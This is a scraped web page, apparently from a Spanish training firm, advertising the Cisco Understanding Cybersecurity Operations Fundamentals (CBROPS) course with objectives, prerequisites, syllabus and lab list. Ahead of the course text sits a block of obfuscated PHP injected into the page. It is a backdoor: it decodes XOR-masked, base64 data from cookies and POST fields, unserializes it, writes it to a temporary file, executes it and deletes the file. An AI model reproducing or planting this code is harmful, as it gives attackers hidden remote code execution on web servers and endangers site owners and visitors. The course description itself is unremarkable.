$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Understanding Cisco Cybersecurity Operations Fundamentals|Grupo Loyal

Understanding Cisco Cybersecurity Operations Fundamentals

TheUnderstanding Cybersecurity Operations Fundamentals (CBROPS) course teaches an understanding of the network infrastructure devices, operations, and vulnerabilities of the Transmission Control Protocol/Internet Protocol (TCP/IP) protocol suite. You will learn basic information about security concepts, common network application operations and attacks, the Windows and Linux operating systems, and the types of data used to investigate security incidents. After completing this course, you will have the basic knowledge required to perform the job role of an associate-level cybersecurity analyst in a threat-centric security operations center to strengthen network protocol, protect your devices and increase operational efficiency. This course prepares you for the Cisco Certified CyberOps Associate certification.

Please note that this course is a combination of Instructor-Led and Self-Paced Study - 5 days in the classroom and approx 1 day of self study. The self-study content will be provided as part of the digital courseware that you will recieve at the beginning of the course and should be part of your preparation for the exam.

Objetivos

After completing this course you should be able to:

Explain how a SOC operates and describe the different types of services that are performed from a Tier 1 SOC analyst’s perspective.
Explain Network Security Monitoring (NSM) tools that are available to the network security analyst.
Explain the data that is available to the network security analyst.
Describe the basic concepts and uses of cryptography.
Describe security flaws in the TCP/IP protocol and how they can be used to attack networks and hosts.
Understand common endpoint security technologies.
Understand the kill chain and the diamond models for incident investigations, and the use of exploit kits by threat actors.
Identify resources for hunting cyber threats.
Explain the need for event data normalization and event correlation.
Identify the common attack vectors.
Identify malicious activities.
Identify patterns of suspicious behaviors.
Conduct security incident investigations.
Explain the use of a typical playbook in the SOC.
Explain the use of SOC metrics to measure the effectiveness of the SOC.
Explain the use of a workflow management system and automation to improve the effectiveness of the SOC.
Describe a typical incident response plan and the functions of a typical CSIRT.
Explain the use of VERIS to document security incidents in a standard format.
Describe the Windows operating system features and functionality.
Describe the Linux operating system features and functionality

Ciberseguridad

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
25 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

This course is designed for an associate-level cybersecurity analyst who is working in security operation centers.

Conocimientos requeridos

Attendees should meet the following prerequisites:

Familiarity with Ethernet and TCP/IP networking
Working knowledge of the Windows and Linux operating systems
Familiarity with basics of networking security concepts
Pre-requisitos:
CCNA - Implementing and Administering Cisco Solutions

Temario

Defining the Security Operations Center

Understanding Network Infrastructure and Network Security Monitoring Tools

Exploring Data Type Categories

Understanding Basic Cryptography Concepts

Understanding Common TCP/IP Attacks

Understanding Endpoint Security Technologies

Understanding Incident Analysis in a Threat-Centric SOC

Identifying Resources for Hunting Cyber Threats

Understanding Event Correlation and Normalization

Identifying Common Attack Vectors

Identifying Malicious Activity

Identifying Patterns of Suspicious Behavior

Conducting Security Incident Investigations

Using a Playbook Model to Organize Security Monitoring

Understanding SOC Metrics

Understanding SOC Workflow and Automation

Describing Incident Response

Understanding the Use of VERIS

Understanding Windows Operating System Basics

Understanding Linux Operating System Basics

Labs

Configure the Initial Collaboration Lab Environment
Use NSM Tools to Analyze Data Categories
Explore Cryptographic Technologies
Explore TCP/IP Attacks
Explore Endpoint Security
Investigate Hacker Methodology
Hunt Malicious Traffic
Correlate Event Logs, PCAPs, and Alerts of an Attack
Investigate Browser-Based Attacks
Analyze Suspicious DNS Activity
Explore Security Data for Analysis
Investigate Suspicious Activity Using Security Onion
Investigate Advanced Persistent Threats
Explore SOC Playbooks
Explore the Windows Operating System
Explore the Linux Operating System

Solicita información del curso

It Formacion

It Formacion